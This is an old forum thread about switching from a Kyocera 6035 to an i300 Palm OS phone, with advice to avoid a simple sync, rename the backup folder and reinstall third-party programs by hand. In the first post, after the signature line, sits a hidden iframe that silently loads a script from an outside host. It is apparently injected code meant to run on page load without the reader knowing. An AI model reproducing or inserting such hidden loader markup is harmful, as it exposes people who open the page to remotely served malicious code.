+ Reply to Thread

switching from kyocera 6035 to I300

I'm about to make the switch and was curious if I could just hook up the I300 to my computer and let the desktop software config the it with the backup files, or if I was risking trouble by doing so. Anybody have comments? Should I uninstall my current desktop software and reinstall from the cd that came with the phone?

My Palm Desktop software is v4.1.
    Pocket Mirror 3.0.2.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

you have the latest desktop which is cool.

you are going from one unique device to another so please dont do a simple sync.. these are not like conventional palm units.

clean out you backup folder (or better yet rename it) and let the phone generat a new backup folder. the best way is to do a manual install of 3rd party programs.

as for addy book, notes, to do's. you can beam those over...

Thanks for the info on renaming my backup folder. After I changed my search string, I was able to get some info, but not that point.

Hmmmm, I just converted from a Handspring Visor Neo to an I300. I performed a hotsync and everything transferred just fine. I was under the impression that as long as both pda's support the Palm OS there should be no problem.

Don't know if this info helps, but my experience nonetheless.
    Keep looking up...

Administrator

Exclamation caveat emptor...

you can do that and sometimes the end user is ok. but sometimes people start to have soft resets, and weird messages pop up on the screen due to some legacy app or file being installed on the new device. doing a fresh install will ensure that your palm environment is clean and trouble free... these phones are not conventional palms and are not as lenient as conventional palms...